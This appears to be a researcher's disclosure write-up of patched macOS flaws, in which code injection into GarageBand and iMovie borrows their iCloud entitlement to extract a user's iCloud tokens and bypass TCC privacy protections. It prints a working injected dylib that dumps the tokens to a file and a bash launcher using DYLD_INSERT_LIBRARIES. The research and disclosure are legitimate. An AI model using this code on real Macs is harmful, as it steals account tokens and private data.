These vulnerabilities were first disclosed at TyphoonCon in Seoul during my talk What happens on your Mac, stays on Apple’s iCloud?! Bypassing Mac privacy mechanisms. I found 2 code injection opportunities in iMovie and GarageBand which allowed me impersonating their com.apple.private.icloud-account.access
entitlements. Then, I was able to talk to iCloud XPC helper which gave me the user’s iCloud tokens. With these tokens, I was able to get all the data that is synchronized with iCloud and is normally protected via TCC (Contacts, Reminders, Calendars, Location, etc).
iCloud XPC helper
My favorite kind of macOS exploitation is bypassing privacy protections applied via TCC. I constantly try to find new ways to get protected data. As a lot of TCC data is synchronized with iCloud, I decided to take a look at how macOS synchronizes it. After some research, I found out that there is an XPC helper located in /S/L/PF/AOSKit.framework/Versions/A/XPCServices/com.apple.iCloudHelper.xpc
. When nicely asked via XPC, it will respond with all the iCloud tokens. Of course, it verifies the client who asks about those tokens in +[AOSAgentServer validateClientWithPid:auditToken:andIdentifier:]
rax = CFDictionaryGetValue(var_38, @"com.apple.private.icloud-account-access");
if (rax != 0x0) {
var_38 = rax;
rbx = CFGetTypeID(rax);
rax = CFBooleanGetTypeID();
rdi = var_38;
if (rbx == rax) {
rax = CFBooleanGetValue(rdi);
rbx = rax;
_AOSLog(0x4, @"XPC SERVER (%@): iCloud Account Access: %d (%p)", r13, sign_extend_64(rax), var_38);
I determined that the validation is done properly and the iCloudHelper requires from the connecting client to be signed with a private com.apple.private.icloud-account-access
entitlement. Further reverse engineering determined that to talk to the helper and get the tokens I would have to use the following code:
#import <Foundation/Foundation.h>
void pwn() {
char *xpc_name = "com.apple.iCloudHelper";
xpc_connection_t connection = xpc_connection_create(xpc_name, NULL);
if (connection == NULL) {
NSLog(@"[+] Couldn't create connection, exiting...");
xpc_connection_set_event_handler(connection, ^(xpc_object_t event) {
NSLog(@"[<] Got event %@", event);
NSLog(@"Got client %@", connection);
pid_t pidOfRemotePeer = xpc_connection_get_pid(connection);
NSLog(@"[+] Remote peer %d", pidOfRemotePeer);
NSLog(@"[+] My PID %d", [[NSProcessInfo processInfo] processIdentifier]);
xpc_object_t message = xpc_dictionary_create(NULL, NULL, 0);
// string clientUid
NSString *uidstring = [NSString stringWithFormat:@"%d", getuid()];
xpc_object_t clientUid = xpc_string_create([uidstring cStringUsingEncoding:NSUTF8StringEncoding]);
// dict payload
// int64 action
// double clientTimestamp
// string accountName
xpc_object_t payload = xpc_dictionary_create(NULL, NULL, 0);
xpc_object_t action = xpc_int64_create(4);
xpc_object_t clientTimestamp = xpc_double_create(13123123);
NSString *appleID = @(getenv("APPLE_ID"));
xpc_object_t accountName = xpc_string_create([appleID cStringUsingEncoding:NSUTF8StringEncoding]);
// string clientID
xpc_object_t clientID = xpc_string_create("blog.wojciechregula.pwn");
// mach_send_right sessionPort
xpc_object_t sessionPort = xpc_string_create("INVALIDPORT");
// string sessionID
xpc_object_t sessionID = xpc_string_create("100006");
// string clientGUIAccess
xpc_object_t clientGUIAccess = xpc_string_create("1");
// string clientKeychainAccess
xpc_object_t clientKeychainAccess = xpc_string_create("111");
xpc_dictionary_set_value(message, "clientUid", clientUid);
xpc_dictionary_set_value(message, "payload", payload);
xpc_dictionary_set_value(payload, "action", action);
xpc_dictionary_set_value(payload, "clientTimestamp", clientTimestamp);
xpc_dictionary_set_value(payload, "accountName", accountName);
xpc_dictionary_set_value(message, "clientID", clientID);
xpc_dictionary_set_value(message, "sessionPort", sessionPort);
xpc_dictionary_set_value(message, "sessionID", sessionID);
xpc_dictionary_set_value(message, "clientGUIAccess", clientGUIAccess);
xpc_dictionary_set_value(message, "clientKeychainAccess", clientKeychainAccess);
xpc_object_t reply = xpc_connection_send_message_with_reply_sync(connection, message);
NSLog(@"reply is %@", reply);
NSString *debugDescription = [NSString stringWithCString:xpc_copy_description(reply) encoding:NSUTF8StringEncoding];
NSLog(@"[<] Debug description: %@", debugDescription);
xpc_object_t result = xpc_dictionary_get_value(reply, "result");
NSData *data = [NSData dataWithBytes:xpc_data_get_bytes_ptr(result) length:xpc_data_get_length(result)];
[data writeToFile:@"/tmp/dump.plist" atomically:YES]; // save the tokens
NSLog(@"[<] Result %@", data);
NSDictionary *obj = (NSDictionary*) [NSKeyedUnarchiver unarchiveObjectWithData:data];
NSLog(@"[<] DATA: %@", obj);
__attribute__((constructor)) static void pwn(int argc, const char **argv) {
NSLog(@"[+] Dylib injected");
I grepped through my filesystem for com.apple.private.icloud-account-access
and got two interesting hits.
GarageBand code injection
First, let’s take a look at GarageBand. I checked its entitlements and besides our interesting com.apple.private.icloud-account-access
it had also the com.apple.private.security.clear-library-validation
$ codesign -d --entitlements - /Applications/GarageBand.app
[Key] com.apple.application-identifier
[String] F3LWYJ7GM7.com.apple.garageband10
[Key] com.apple.private.security.clear-library-validation
[Bool] true
[Key] com.apple.private.icloud-account-access
[Bool] true
With otool
I verified if GarageBand loads any frameworks which I could possibly change and get the code execution within the privileged Garageband process:
$ otool -L /Applications/GarageBand.app/Contents/MacOS/GarageBand
@rpath/MAGUI.framework/Versions/A/MAGUI (compatibility version 1.0.0, current version 5753.0.0)
@rpath/MAMachineLearning.framework/Versions/A/MAMachineLearning (compatibility version 1.0.0, current version 5753.0.0)
@rpath/MAMusicAnalysis.framework/Versions/A/MAMusicAnalysis (compatibility version 1.0.0, current version 5753.0.0)
Great, we have a lot of @rpath
references. I then used a dylib proxying attack and got the tokens as you can see below:
Apple fixed this vulnerability by taking the com.apple.private.icloud-account-access
entitlement from Garageband. The vulnerability has CVE-2021-30654
iMovie code injection
The exploitation of iMovie was even simpler. Generally, you cannot DYLD_INSERT_LIBRARIES
on Apple’s executables. However, this fact doesn’t apply to those executables downloaded from the AppStore! (thanks Csaba for this information!) At that time iMovie didn’t have the hardened runtime turned on…
So the whole exploitation was about using the following bash script with the malicious dylib code mentioned before.
# clear stuff
if [[ -d "/tmp/iMovie.app" ]]
echo "Removing old exploitation remainings..."
rm -fr "/tmp/iMovie.app"
# copy iMovie to /tmp
cp -R "$2" /tmp/
# copy iCloudHelper XPC service
mkdir "/tmp/iMovie.app/Contents/XPCServices"
cp -R "/System/Library/PrivateFrameworks/AOSKit.framework/Versions/A/XPCServices/com.apple.iCloudHelper.xpc/" "/tmp/iMovie.app/Contents/XPCServices/com.apple.iCloudHelper.xpc/"
appl=`defaults read MobileMeAccounts Accounts | grep AccountID | cut -d'"' -f 2`
DYLD_INSERT_LIBRARIES="$1" APPLE_ID="$appl" /tmp/iMovie.app/Contents/MacOS/iMovie
The vulnerability has CVE-2021-30757
Turned out that the iCloud tokens are normally stored in the Keychain under the following names:
For demo purposes I took the com.apple.account.AppleAccount.find-my-iphone-app-token
and created a simple PoC that downloaded my location directly from the iCloud. Of course, without involving the TCC. Using other tokens I was able to get access also to Calendars, Reminders, Contacts, etc :-)
Downgrade attacks & Apple final patches
After those 2 fixes for iMovie and Garageband, I was able to re-exploit both vulnz. I dropped the old and vulnerable iMovie and Garageband versions to do so. Finally, Apple added those apps to the AppleMobileFileIntegrity denylist so the downgrade attack is not possible. CVEs are CVE-2022-32877
and CVE-2022-32896
You can find it in the AppleMobileFileIntegrity.kext
in the postValidation(LazyPath*, cs_blob*, unsigned int, OSDictionary*, unsigned char, bool, unsigned int, char const*, char**, unsigned long*)
rbx = var_30;
if (_strcmp(rbx, "com.apple.garageband10") != 0x0 || dict_has_entitlement(r12, "com.apple.private.icloud-account-access") == 0x0) goto loc_11b02;
if (_strcmp(rbx, "com.apple.bootcampassistant.installd") == 0x0 || _strcmp(rbx, "com.apple.Automator") == 0x0 || _strcmp(rbx, "com.apple.DirectoryUtility") == 0x0 || _strcmp(rbx, "com.apple.iMovieApp") == 0x0 || _strcmp(rbx, "com.apple.FaceTime") == 0x0 || _strcmp(rbx, "com.apple.PhotoBooth") == 0x0 || _strcmp(rbx, "com.apple.QuickTimePlayerX") == 0x0 || _strcmp(rbx, "com.apple.configd") == 0x0) goto loc_11daa;